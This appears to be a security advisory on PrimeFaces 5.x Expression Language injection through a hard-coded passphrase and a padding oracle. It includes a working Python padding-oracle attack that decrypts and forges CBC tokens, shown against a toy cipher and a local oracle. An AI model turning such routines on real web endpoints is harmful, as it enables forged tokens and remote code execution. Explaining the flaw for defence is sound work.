PrimeFaces 5.x Expression Language injection

Description

PrimeFaces is an open source User Interface (UI) component library for JavaServer Faces (JSF) applications. Giorgio Fedon of Minded Security found two critical vulnerabilities in the PrimeFaces 5.x implementation.

By abusing either of these issues, an unauthenticated attacker can execute arbitrary code on the application server through Expression Language (EL) injection.

  • PrimeSecret: the passphrase used to encrypt several PrimeFaces request parameters, such as "pfdrid", is a hard-coded default. Anyone who knows that default can produce validly encrypted parameter values of their choosing.
  • PrimeOracle: the internal crypto routine that decrypts those same parameters (such as "pfdrid") acts as a Padding Oracle, which lets an attacker recover or forge encrypted parameter values without knowing the passphrase at all.
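
The following Python is an added illustration of the two bullets above; it is not code from this advisory and not PrimeFaces code. The first bullet needs no attack code at all: once the default passphrase is known, the attacker derives the same key the server uses and encrypts any value they like, so the example only models the server side of it (SERVER_KEY derived from a constructed passphrase). The second bullet is the interesting one, so the example shows a generic CBC padding-oracle attack that both reads an encrypted value and forges a ciphertext for an attacker-chosen plaintext, using nothing but the server's accept/reject verdict. The cipher is a toy 4-round Feistel construction over SHA-256, and the passphrase, token contents and the server_accepts oracle are constructed for the example. The attack assumes only a CBC-mode cipher with PKCS#7-style padding whose padding failures are distinguishable, which is what a padding oracle means; it does not assume anything about the specific cipher PrimeFaces uses.

```python
# Added illustration of a CBC padding-oracle attack; not PrimeFaces code.
# Toy 4-round Feistel cipher over SHA-256 (the cipher under CBC is irrelevant).
import hashlib
import secrets

BLOCK = 16

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key, half, i):
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]

def _block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, r, i))
    return l + r

def _block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, l, i)), l
    return l + r

def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data):
    n = data[-1] if data else 0  # strict check; the raise is what leaks
    if len(data) % BLOCK or not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, plaintext):
    out, prev, padded = [], iv, pkcs7_pad(plaintext)
    for i in range(0, len(padded), BLOCK):
        prev = _block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, ciphertext):
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        out.append(_xor(_block_decrypt(key, ciphertext[i:i + BLOCK]), prev))
        prev = ciphertext[i:i + BLOCK]
    return pkcs7_unpad(b"".join(out))

# Server side: key derived from a passphrase (a hard-coded default in the
# vulnerable deployment; the value here is constructed for the example).
SERVER_KEY = hashlib.sha256(b"default-passphrase").digest()

def server_accepts(iv, ciphertext):
    """The oracle: does the token decrypt with valid padding?"""
    try:
        cbc_decrypt(SERVER_KEY, iv, ciphertext)
        return True
    except ValueError:
        return False

def recover_intermediate(oracle, block):
    """Recover D(block), the raw block-cipher output, with <= 256 queries per
    byte: craft the preceding block so bytes after pos decrypt to pad_val."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        pad_val = BLOCK - pos
        crafted = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            crafted[j] = inter[j] ^ pad_val
        for guess in range(256):
            crafted[pos] = guess
            if not oracle(bytes(crafted), block):
                continue
            if pos == BLOCK - 1:
                # Rule out an accidental longer padding (e.g. ..02 02): flipping
                # the byte before the last one must not change the verdict.
                probe = bytearray(crafted)
                probe[pos - 1] ^= 0xFF
                if not oracle(bytes(probe), block):
                    continue
            inter[pos] = guess ^ pad_val
            break
        else:
            raise RuntimeError("oracle never accepted a guess")
    return bytes(inter)

def padding_oracle_decrypt(oracle, iv, ciphertext):
    """Read a token without the key: P_i = D(C_i) xor C_{i-1}."""
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        out.append(_xor(recover_intermediate(oracle, ciphertext[i:i + BLOCK]), prev))
        prev = ciphertext[i:i + BLOCK]
    return pkcs7_unpad(b"".join(out))

def padding_oracle_forge(oracle, plaintext):
    """Forge (iv, ciphertext) for a chosen plaintext without the key (CBC-R)."""
    padded = pkcs7_pad(plaintext)
    chain = [secrets.token_bytes(BLOCK)]  # random last block, work backwards
    for i in range(len(padded) - BLOCK, -1, -BLOCK):
        inter = recover_intermediate(oracle, chain[0])
        chain.insert(0, _xor(inter, padded[i:i + BLOCK]))
    return chain[0], b"".join(chain[1:])
```

In the real attack the forged plaintext would be the EL expression the server goes on to evaluate; here it is a neutral string. The cost is about 16 x 128 oracle queries per block on average, which is trivial against a web endpoint, and the forged token passes the same padding check as a genuine one, so the server cannot tell them apart.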

Remediation

Upgrade to the latest PrimeFaces release or apply the official fix; the official fix is linked in the References section.

References
Severity